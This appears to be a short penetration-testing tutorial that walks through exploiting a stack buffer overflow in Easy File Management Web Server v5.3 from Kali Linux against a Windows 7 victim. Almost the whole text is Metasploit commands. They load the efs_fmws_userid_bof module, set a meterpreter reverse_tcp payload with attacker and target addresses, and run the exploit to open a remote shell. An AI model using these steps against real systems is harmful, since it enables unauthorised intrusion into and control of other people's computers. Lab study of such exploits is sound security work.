Kali Linux, Penetration Testing

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets

Easy File Management Web Server v5.3


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/http/efs_fmws_userid_bof

msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (efs_fmws_userid_bof)>set lhost (IP of Local Host)

msf exploit (efs_fmws_userid_bof)>set rhost (IP of Remote Host)

msf exploit (efs_fmws_userid_bof)>exploit